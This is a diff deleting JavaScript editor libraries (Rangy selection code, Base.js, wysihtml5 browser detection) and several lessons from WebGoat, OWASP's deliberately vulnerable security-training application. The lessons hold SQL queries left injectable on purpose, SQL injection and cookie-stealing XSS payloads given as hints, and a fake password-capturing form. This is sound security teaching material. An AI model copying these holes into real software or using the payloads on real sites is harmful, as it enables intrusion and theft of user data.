- this.rangeCount = 1;
- this.isCollapsed = this._ranges[0].collapsed;
- updateAnchorAndFocusFromRange(this, range, false);
- }
- };
-
- selProto.setRanges = function(ranges) {
- this.removeAllRanges();
- var rangeCount = ranges.length;
- if (rangeCount > 1) {
- createControlSelection(this, ranges);
- } else if (rangeCount) {
- this.addRange(ranges[0]);
- }
- };
- } else {
- module.fail("No means of selecting a Range or TextRange was found");
- return false;
- }
-
- selProto.getRangeAt = function(index) {
- if (index < 0 || index >= this.rangeCount) {
- throw new DOMException("INDEX_SIZE_ERR");
- } else {
- return this._ranges[index];
- }
- };
-
- var refreshSelection;
-
- if (useDocumentSelection) {
- refreshSelection = function(sel) {
- var range;
- if (api.isSelectionValid(sel.win)) {
- range = sel.docSelection.createRange();
- } else {
- range = dom.getBody(sel.win.document).createTextRange();
- range.collapse(true);
- }
-
-
- if (sel.docSelection.type == CONTROL) {
- updateControlSelection(sel);
- } else if (isTextRange(range)) {
- updateFromTextRange(sel, range);
- } else {
- updateEmptySelection(sel);
- }
- };
- } else if (util.isHostMethod(testSelection, "getRangeAt") && typeof testSelection.rangeCount == "number") {
- refreshSelection = function(sel) {
- if (implementsControlRange && implementsDocSelection && sel.docSelection.type == CONTROL) {
- updateControlSelection(sel);
- } else {
- sel._ranges.length = sel.rangeCount = sel.nativeSelection.rangeCount;
- if (sel.rangeCount) {
- for (var i = 0, len = sel.rangeCount; i < len; ++i) {
- sel._ranges[i] = new api.WrappedRange(sel.nativeSelection.getRangeAt(i));
- }
- updateAnchorAndFocusFromRange(sel, sel._ranges[sel.rangeCount - 1], selectionIsBackwards(sel.nativeSelection));
- sel.isCollapsed = selectionIsCollapsed(sel);
- } else {
- updateEmptySelection(sel);
- }
- }
- };
- } else if (selectionHasAnchorAndFocus && typeof testSelection.isCollapsed == BOOLEAN && typeof testRange.collapsed == BOOLEAN && api.features.implementsDomRange) {
- refreshSelection = function(sel) {
- var range, nativeSel = sel.nativeSelection;
- if (nativeSel.anchorNode) {
- range = getSelectionRangeAt(nativeSel, 0);
- sel._ranges = [range];
- sel.rangeCount = 1;
- updateAnchorAndFocusFromNativeSelection(sel);
- sel.isCollapsed = selectionIsCollapsed(sel);
- } else {
- updateEmptySelection(sel);
- }
- };
- } else {
- module.fail("No means of obtaining a Range or TextRange from the user's selection was found");
- return false;
- }
-
- selProto.refresh = function(checkForChanges) {
- var oldRanges = checkForChanges ? this._ranges.slice(0) : null;
- refreshSelection(this);
- if (checkForChanges) {
- var i = oldRanges.length;
- if (i != this._ranges.length) {
- return false;
- }
- while (i--) {
- if (!DomRange.rangesEqual(oldRanges[i], this._ranges[i])) {
- return false;
- }
- }
- return true;
- }
- };
-
- // Removal of a single range
- var removeRangeManually = function(sel, range) {
- var ranges = sel.getAllRanges(), removed = false;
- sel.removeAllRanges();
- for (var i = 0, len = ranges.length; i < len; ++i) {
- if (removed || range !== ranges[i]) {
- sel.addRange(ranges[i]);
- } else {
- // According to the draft WHATWG Range spec, the same range may be added to the selection multiple
- // times. removeRange should only remove the first instance, so the following ensures only the first
- // instance is removed
- removed = true;
- }
- }
- if (!sel.rangeCount) {
- updateEmptySelection(sel);
- }
- };
-
- if (implementsControlRange) {
- selProto.removeRange = function(range) {
- if (this.docSelection.type == CONTROL) {
- var controlRange = this.docSelection.createRange();
- var rangeElement = getSingleElementFromRange(range);
-
- // Create a new ControlRange containing all the elements in the selected ControlRange minus the
- // element contained by the supplied range
- var doc = dom.getDocument(controlRange.item(0));
- var newControlRange = dom.getBody(doc).createControlRange();
- var el, removed = false;
- for (var i = 0, len = controlRange.length; i < len; ++i) {
- el = controlRange.item(i);
- if (el !== rangeElement || removed) {
- newControlRange.add(controlRange.item(i));
- } else {
- removed = true;
- }
- }
- newControlRange.select();
-
- // Update the wrapped selection based on what's now in the native selection
- updateControlSelection(this);
- } else {
- removeRangeManually(this, range);
- }
- };
- } else {
- selProto.removeRange = function(range) {
- removeRangeManually(this, range);
- };
- }
-
- // Detecting if a selection is backwards
- var selectionIsBackwards;
- if (!useDocumentSelection && selectionHasAnchorAndFocus && api.features.implementsDomRange) {
- selectionIsBackwards = function(sel) {
- var backwards = false;
- if (sel.anchorNode) {
- backwards = (dom.comparePoints(sel.anchorNode, sel.anchorOffset, sel.focusNode, sel.focusOffset) == 1);
- }
- return backwards;
- };
-
- selProto.isBackwards = function() {
- return selectionIsBackwards(this);
- };
- } else {
- selectionIsBackwards = selProto.isBackwards = function() {
- return false;
- };
- }
-
- // Selection text
- // This is conformant to the new WHATWG DOM Range draft spec but differs from WebKit and Mozilla's implementation
- selProto.toString = function() {
-
- var rangeTexts = [];
- for (var i = 0, len = this.rangeCount; i < len; ++i) {
- rangeTexts[i] = "" + this._ranges[i];
- }
- return rangeTexts.join("");
- };
-
- function assertNodeInSameDocument(sel, node) {
- if (sel.anchorNode && (dom.getDocument(sel.anchorNode) !== dom.getDocument(node))) {
- throw new DOMException("WRONG_DOCUMENT_ERR");
- }
- }
-
- // No current browsers conform fully to the HTML 5 draft spec for this method, so Rangy's own method is always used
- selProto.collapse = function(node, offset) {
- assertNodeInSameDocument(this, node);
- var range = api.createRange(dom.getDocument(node));
- range.collapseToPoint(node, offset);
- this.removeAllRanges();
- this.addRange(range);
- this.isCollapsed = true;
- };
-
- selProto.collapseToStart = function() {
- if (this.rangeCount) {
- var range = this._ranges[0];
- this.collapse(range.startContainer, range.startOffset);
- } else {
- throw new DOMException("INVALID_STATE_ERR");
- }
- };
-
- selProto.collapseToEnd = function() {
- if (this.rangeCount) {
- var range = this._ranges[this.rangeCount - 1];
- this.collapse(range.endContainer, range.endOffset);
- } else {
- throw new DOMException("INVALID_STATE_ERR");
- }
- };
-
- // The HTML 5 spec is very specific on how selectAllChildren should be implemented so the native implementation is
- // never used by Rangy.
- selProto.selectAllChildren = function(node) {
- assertNodeInSameDocument(this, node);
- var range = api.createRange(dom.getDocument(node));
- range.selectNodeContents(node);
- this.removeAllRanges();
- this.addRange(range);
- };
-
- selProto.deleteFromDocument = function() {
- // Sepcial behaviour required for Control selections
- if (implementsControlRange && implementsDocSelection && this.docSelection.type == CONTROL) {
- var controlRange = this.docSelection.createRange();
- var element;
- while (controlRange.length) {
- element = controlRange.item(0);
- controlRange.remove(element);
- element.parentNode.removeChild(element);
- }
- this.refresh();
- } else if (this.rangeCount) {
- var ranges = this.getAllRanges();
- this.removeAllRanges();
- for (var i = 0, len = ranges.length; i < len; ++i) {
- ranges[i].deleteContents();
- }
- // The HTML5 spec says nothing about what the selection should contain after calling deleteContents on each
- // range. Firefox moves the selection to where the final selected range was, so we emulate that
- this.addRange(ranges[len - 1]);
- }
- };
-
- // The following are non-standard extensions
- selProto.getAllRanges = function() {
- return this._ranges.slice(0);
- };
-
- selProto.setSingleRange = function(range) {
- this.setRanges( [range] );
- };
-
- selProto.containsNode = function(node, allowPartial) {
- for (var i = 0, len = this._ranges.length; i < len; ++i) {
- if (this._ranges[i].containsNode(node, allowPartial)) {
- return true;
- }
- }
- return false;
- };
-
- selProto.toHtml = function() {
- var html = "";
- if (this.rangeCount) {
- var container = DomRange.getRangeDocument(this._ranges[0]).createElement("div");
- for (var i = 0, len = this._ranges.length; i < len; ++i) {
- container.appendChild(this._ranges[i].cloneContents());
- }
- html = container.innerHTML;
- }
- return html;
- };
-
- function inspect(sel) {
- var rangeInspects = [];
- var anchor = new DomPosition(sel.anchorNode, sel.anchorOffset);
- var focus = new DomPosition(sel.focusNode, sel.focusOffset);
- var name = (typeof sel.getName == "function") ? sel.getName() : "Selection";
-
- if (typeof sel.rangeCount != "undefined") {
- for (var i = 0, len = sel.rangeCount; i < len; ++i) {
- rangeInspects[i] = DomRange.inspect(sel.getRangeAt(i));
- }
- }
- return "[" + name + "(Ranges: " + rangeInspects.join(", ") +
- ")(anchor: " + anchor.inspect() + ", focus: " + focus.inspect() + "]";
-
- }
-
- selProto.getName = function() {
- return "WrappedSelection";
- };
-
- selProto.inspect = function() {
- return inspect(this);
- };
-
- selProto.detach = function() {
- this.win[windowPropertyName] = null;
- this.win = this.anchorNode = this.focusNode = null;
- };
-
- WrappedSelection.inspect = inspect;
-
- api.Selection = WrappedSelection;
-
- api.selectionPrototype = selProto;
-
- api.addCreateMissingNativeApiListener(function(win) {
- if (typeof win.getSelection == "undefined") {
- win.getSelection = function() {
- return api.getSelection(this);
- };
- }
- win = null;
- });
-});
-/*
- Base.js, version 1.1a
- Copyright 2006-2010, Dean Edwards
- License: http://www.opensource.org/licenses/mit-license.php
-*/
-
-var Base = function() {
- // dummy
-};
-
-Base.extend = function(_instance, _static) { // subclass
- var extend = Base.prototype.extend;
-
- // build the prototype
- Base._prototyping = true;
- var proto = new this;
- extend.call(proto, _instance);
- proto.base = function() {
- // call this method from any other method to invoke that method's ancestor
- };
- delete Base._prototyping;
-
- // create the wrapper for the constructor function
- //var constructor = proto.constructor.valueOf(); //-dean
- var constructor = proto.constructor;
- var klass = proto.constructor = function() {
- if (!Base._prototyping) {
- if (this._constructing || this.constructor == klass) { // instantiation
- this._constructing = true;
- constructor.apply(this, arguments);
- delete this._constructing;
- } else if (arguments[0] != null) { // casting
- return (arguments[0].extend || extend).call(arguments[0], proto);
- }
- }
- };
-
- // build the class interface
- klass.ancestor = this;
- klass.extend = this.extend;
- klass.forEach = this.forEach;
- klass.implement = this.implement;
- klass.prototype = proto;
- klass.toString = this.toString;
- klass.valueOf = function(type) {
- //return (type == "object") ? klass : constructor; //-dean
- return (type == "object") ? klass : constructor.valueOf();
- };
- extend.call(klass, _static);
- // class initialisation
- if (typeof klass.init == "function") klass.init();
- return klass;
-};
-
-Base.prototype = {
- extend: function(source, value) {
- if (arguments.length > 1) { // extending with a name/value pair
- var ancestor = this[source];
- if (ancestor && (typeof value == "function") && // overriding a method?
- // the valueOf() comparison is to avoid circular references
- (!ancestor.valueOf || ancestor.valueOf() != value.valueOf()) &&
- /\bbase\b/.test(value)) {
- // get the underlying method
- var method = value.valueOf();
- // override
- value = function() {
- var previous = this.base || Base.prototype.base;
- this.base = ancestor;
- var returnValue = method.apply(this, arguments);
- this.base = previous;
- return returnValue;
- };
- // point to the underlying method
- value.valueOf = function(type) {
- return (type == "object") ? value : method;
- };
- value.toString = Base.toString;
- }
- this[source] = value;
- } else if (source) { // extending with an object literal
- var extend = Base.prototype.extend;
- // if this object has a customised extend method then use it
- if (!Base._prototyping && typeof this != "function") {
- extend = this.extend || extend;
- }
- var proto = {toSource: null};
- // do the "toString" and other methods manually
- var hidden = ["constructor", "toString", "valueOf"];
- // if we are prototyping then include the constructor
- var i = Base._prototyping ? 0 : 1;
- while (key = hidden[i++]) {
- if (source[key] != proto[key]) {
- extend.call(this, key, source[key]);
-
- }
- }
- // copy each of the source object's properties to this object
- for (var key in source) {
- if (!proto[key]) extend.call(this, key, source[key]);
- }
- }
- return this;
- }
-};
-
-// initialise
-Base = Base.extend({
- constructor: function() {
- this.extend(arguments[0]);
- }
-}, {
- ancestor: Object,
- version: "1.1",
-
- forEach: function(object, block, context) {
- for (var key in object) {
- if (this.prototype[key] === undefined) {
- block.call(context, object[key], key, object);
- }
- }
- },
-
- implement: function() {
- for (var i = 0; i < arguments.length; i++) {
- if (typeof arguments[i] == "function") {
- // if it's a function, call it
- arguments[i](this.prototype);
- } else {
- // add the interface using the extend method
- this.prototype.extend(arguments[i]);
- }
- }
- return this;
- },
-
- toString: function() {
- return String(this.valueOf());
- }
-});/**
- * Detect browser support for specific features
- */
-wysihtml5.browser = (function() {
- var userAgent = navigator.userAgent,
- testElement = document.createElement("div"),
- // Browser sniffing is unfortunately needed since some behaviors are impossible to feature detect
- isIE = userAgent.indexOf("MSIE") !== -1 && userAgent.indexOf("Opera") === -1,
- isGecko = userAgent.indexOf("Gecko") !== -1 && userAgent.indexOf("KHTML") === -1,
- isWebKit = userAgent.indexOf("AppleWebKit/") !== -1,
- isChrome = userAgent.indexOf("Chrome/") !== -1,
- isOpera = userAgent.indexOf("Opera/") !== -1;
-
- function iosVersion(userAgent) {
- return ((/ipad|iphone|ipod/.test(userAgent) && userAgent.match(/ os (\d+).+? like mac os x/)) || [, 0])[1];
- }
-
- return {
- // Static variable needed, publicly accessible, to be able override it in unit tests
- USER_AGENT: userAgent,
-
- /**
- * Exclude browsers that are not capable of displaying and handling
- * contentEditable as desired:
- * - iPhone, iPad (tested iOS 4.2.2) and Android (tested 2.2) refuse to make contentEditables focusable
- * - IE < 8 create invalid markup and crash randomly from time to time
- *
- * @return {Boolean}
- */
- supported: function() {
- var userAgent = this.USER_AGENT.toLowerCase(),
- // Essential for making html elements editable
- hasContentEditableSupport = "contentEditable" in testElement,
- // Following methods are needed in order to interact with the contentEditable area
- hasEditingApiSupport = document.execCommand && document.queryCommandSupported && document.queryCommandState,
- // document selector apis are only supported by IE 8+, Safari 4+, Chrome and Firefox 3.5+
- hasQuerySelectorSupport = document.querySelector && document.querySelectorAll,
- // contentEditable is unusable in mobile browsers (tested iOS 4.2.2, Android 2.2, Opera Mobile, WebOS 3.05)
- isIncompatibleMobileBrowser = (this.isIos() && iosVersion(userAgent) < 5) || userAgent.indexOf("opera mobi") !== -1 || userAgent.indexOf("hpwos/") !== -1;
-
- return hasContentEditableSupport
- && hasEditingApiSupport
- && hasQuerySelectorSupport
- && !isIncompatibleMobileBrowser;
- },
-
- isTouchDevice: function() {
- return this.supportsEvent("touchmove");
- },
-
- isIos: function() {
- var userAgent = this.USER_AGENT.toLowerCase();
- return userAgent.indexOf("webkit") !== -1 && userAgent.indexOf("mobile") !== -1;
- },
-
- /**
- * Whether the browser supports sandboxed iframes
- * Currently only IE 6+ offers such feature
-
- // Please enter your password:
-
- return hints;
- }
-
- /**
- * Gets the ranking attribute of the HelloScreen object
- *
- * @return The ranking value
- */
- private final static Integer DEFAULT_RANKING = new Integer(10);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- protected Category getDefaultCategory()
- {
- return Category.AJAX_SECURITY;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("LAB: DOM-Based cross-site scripting");
- }
-
- public String getInstructions(WebSession s)
- {
- String instructions = "";
-
- if (getLessonTracker(s).getStage() == 1)
- {
- instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: OWASP IMAGE";
- }
- else if (getLessonTracker(s).getStage() == 2)
- {
- instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag";
- }
- else if (getLessonTracker(s).getStage() == 3)
- {
- instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag.";
- }
- else if (getLessonTracker(s).getStage() == 4)
- {
- instructions = "STAGE 4:\tUse the following to create a fake login form:
"
- + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button "
- + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>";
- }
- else if (getLessonTracker(s).getStage() == 5)
- {
- instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in escape.js.";
- }
- return (instructions);
- }
-
- private String getFileContent(String content)
- {
- BufferedReader is = null;
- StringBuffer sb = new StringBuffer();
-
- try
- {
- is = new BufferedReader(new FileReader(new File(content)));
- String s = null;
-
- while ((s = is.readLine()) != null)
- {
- sb.append(s);
- }
- } catch (Exception e)
- {
- e.printStackTrace();
- } finally
- {
- if (is != null)
- {
- try
- {
- is.close();
- } catch (IOException ioe)
- {
-
- }
- }
- }
-
- return sb.toString();
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java b/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java
deleted file mode 100644
index 7f06eef1b..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java
+++ /dev/null
@@ -1,252 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.ResultSetMetaData;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
- */
-public class DOS_Login extends LessonAdapter
-{
-
- /**
- * Description of the Field
- */
- protected final static String PASSWORD = "Password";
-
- /**
- * Description of the Field
- */
- protected final static String USERNAME = "Username";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- String username = "";
- String password = "";
- username = s.getParser().getRawParameter(USERNAME);
- password = s.getParser().getRawParameter(PASSWORD);
-
- // don;t allow user name from other lessons. it would be too simple.
- if (username.equals("jeff") || username.equals("dave"))
- {
- ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson"));
- return (ec.addElement(makeLogin(s)));
- }
-
- // Check if the login is valid
- Connection connection = DatabaseUtilities.getConnection(s);
-
- String query = "SELECT * FROM user_system_data WHERE user_name = '" + username + "' and password = '"
- + password + "'";
- ec.addElement(new StringElement(query));
-
- try
- {
- Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- ResultSet results = statement.executeQuery(query);
-
- if ((results != null) && (results.first() == true))
- {
- ResultSetMetaData resultsMetaData = results.getMetaData();
- ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
- results.last();
-
- // If they get back more than one user they succeeded
- if (results.getRow() >= 1)
- {
- // Make sure this isn't data from an sql injected query.
- if (results.getString(2).equals(username) && results.getString(3).equals(password))
- {
- String insertData1 = "INSERT INTO user_login VALUES ( '" + username + "', '"
- + s.getUserName() + "' )";
- statement.executeUpdate(insertData1);
- }
- // check the total count of logins
- query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
- results = statement.executeQuery(query);
- results.last();
- // If they get back more than one user they succeeded
- if (results.getRow() >= 3)
- {
- makeSuccess(s);
- String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName()
- + "'";
- statement.executeUpdate(deleteData1);
- return (new H1("Congratulations! Lesson Completed"));
- }
-
- ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow()));
- }
- }
- else
- {
- ec.addElement(new H2("Login Failed"));
- // check the total count of logins
- query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
- results = statement.executeQuery(query);
- results.last();
- ec.addElement(new H2("Successfull login count: " + results.getRow()));
-
- }
- } catch (SQLException sqle)
- {
- ec.addElement(new P().addElement(sqle.getMessage()));
- sqle.printStackTrace();
- }
- } catch (ParameterNotFoundException pnfe)
- {
- /**
- * Catching this exception prevents the "Error generating
- * org.owasp.webgoat.lesson.DOS_Login" message from being displayed on first load. Note
- * that if we are missing a parameter in the request, we do not want to continue
- * processing and we simply want to display the default login page.
- */
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (ec.addElement(makeLogin(s)));
- }
-
- /**
- * Gets the category attribute of the WeakAuthenticationCookie object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.DOS;
- }
-
- /**
- * Gets the hints attribute of the CookieScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Use a SQL Injection to obtain the user names. ");
- hints
- .add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
- hints.add("Try "dont_care' or '1' = '1" in the password field");
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(90);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the CookieScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Denial of Service from Multiple Logins");
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element makeLogin(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- // add the login fields
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR row1 = new TR();
- TR row2 = new TR();
- row1.addElement(new TD(new StringElement("User Name: ")));
- row2.addElement(new TD(new StringElement("Password: ")));
-
- Input input1 = new Input(Input.TEXT, USERNAME, "");
- Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
- row1.addElement(new TD(input1));
- row2.addElement(new TD(input2));
- t.addElement(row1);
- t.addElement(row2);
-
- Element b = ECSFactory.makeButton("Login");
- t.addElement(new TR(new TD(b)));
- ec.addElement(t);
-
- return (ec);
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java b/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java
deleted file mode 100644
index 707e00e53..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/DangerousEval.java
+++ /dev/null
@@ -1,282 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Eric Sheridan, Aspect Security
- * @created October 28, 2003
- */
-
-public class DangerousEval extends LessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- public final static String PASSED = "__DANGEROUS_EVAL_PASS";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
-
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String regex1 = "^[0-9]{3}$";// any three digits
- Pattern pattern1 = Pattern.compile(regex1);
-
- try
- {
- checkSuccess(s);
-
- String param1 = s.getParser().getRawParameter("field1", "111");
- // String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214
- // 0002 1999"));
- float quantity = 1.0f;
- float total = 0.0f;
- float runningTotal = 0.0f;
-
- // FIXME: encode output of field2, then s.setMessage( field2 );
- ec.addElement("");
- //
- ec.addElement(new HR().setWidth("90%"));
- ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
- tr.addElement(new TH().addElement("Price").setWidth("10%"));
- tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
- tr.addElement(new TH().addElement("Total").setWidth("7%"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
- tr.addElement(new TD().addElement("69.99").setAlign("right"));
- tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "1"))).setAlign("right"));
- quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
- total = quantity * 69.99f;
- runningTotal += total;
- tr.addElement(new TD().addElement("$" + total));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
- tr.addElement(new TD().addElement("27.99").setAlign("right"));
- tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "1"))).setAlign("right"));
- quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
- total = quantity * 27.99f;
- runningTotal += total;
- tr.addElement(new TD().addElement("$" + total));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel� Centrino�"));
- tr.addElement(new TD().addElement("1599.99").setAlign("right"));
- tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "1"))).setAlign("right"));
- quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
- total = quantity * 1599.99f;
- runningTotal += total;
- tr.addElement(new TD().addElement("$" + total));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
- tr.addElement(new TD().addElement("299.99").setAlign("right"));
-
- tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "1"))).setAlign("right"));
- quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
- total = quantity * 299.99f;
- runningTotal += total;
- tr.addElement(new TD().addElement("$" + total));
- t.addElement(tr);
-
- ec.addElement(t);
-
- t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- ec.addElement(new BR());
-
- tr = new TR();
- tr.addElement(new TD().addElement("The total charged to your credit card:"));
- tr.addElement(new TD().addElement("$" + runningTotal));
-
- Input b = new Input();
- b.setType(Input.BUTTON);
- b.setValue("Update Cart");
- b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-
- tr.addElement(new TD().addElement(b));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement("Enter your credit card number:"));
- tr.addElement(new TD()
- .addElement(""));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement("Enter your three digit access code:"));
- tr.addElement(new TD().addElement(""));
- // tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
- t.addElement(tr);
-
- b = new Input();
- b.setType(Input.BUTTON);
- b.setValue("Purchase");
- b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-
- tr = new TR();
- tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
- t.addElement(tr);
-
- ec.addElement(t);
- ec.addElement(new BR());
- ec.addElement(new HR().setWidth("90%"));
-
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
- return (ec);
- }
-
- /**
- * DOCUMENT ME!
- *
- * @return DOCUMENT ME!
- */
- protected Category getDefaultCategory()
- {
- return Category.AJAX_SECURITY;
- }
-
- /**
- * Gets the hints attribute of the AccessControlScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("The lesson is similar to the standard reflected cross-site scripting lesson.");
- hints.add("The access code parameter is vulnerable to a reflected cross-site scripting problem.");
- hints.add("The usual <SCRIPT>alert(document.cookie);</SCRIPT> will not work in this lesson. Why?");
- hints.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the < and > characters.");
- hints.add("In order to pass this lesson, you must 'alert' the document.cookie.");
- hints.add("Try 123');alert(document.cookie);('");
- return hints;
- }
-
-
